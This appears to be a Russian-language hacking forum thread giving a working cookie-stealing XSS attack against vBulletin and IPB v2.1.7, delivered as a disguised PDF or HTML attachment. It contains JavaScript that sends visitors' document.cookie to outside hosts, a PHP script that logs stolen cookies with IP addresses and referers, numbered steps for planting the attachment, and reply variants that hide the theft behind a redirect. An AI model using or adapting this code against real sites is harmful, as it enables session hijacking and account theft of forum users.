XSS vbulletin and IPB v2.1.7 With IE test:<html><script> alert("hello");</script></html> ----------------------------------------------------------------- test.pdf ------ Code: <html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html> c.php ----- Code: <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("m/d/Y g:i:s a"); $referer= getenv ('HTTP_REFERER'); $fl = fopen('log.txt', 'a'); fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); fclose($fl); ?> 1_ Пишут test.pdf и c.php 2_ Помещенный c.php на webserver. 3_ Изменяют(Заменяют) url в test.pdf. 4_ Делают пост с test.pdf как attachement. 5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt Лог сниффера Code: <html> <script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> </html>
ребята как заставить его работать ? Code: <html> <script> document.write('<img src="http://blablabla.org/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>'); document.location.href="https://www.google.com/adsense/testmagic.pdf"; </script> </html> или Code: <html> <script> document.write('<img src="http://antichat.ru/cgi-bin/s.jpg?'+document.cookie+'" WIDTH=0 HEIGHT=0>'); document.location.href="https://www.google.com/adsense/testmagic.pdf"; </script> </html>
Дык.. не обязательно pdf. Ещё можно точно такую же шнягу провести и с .html -) В IPB по крайне мере иногда разрешен данный вид атача.
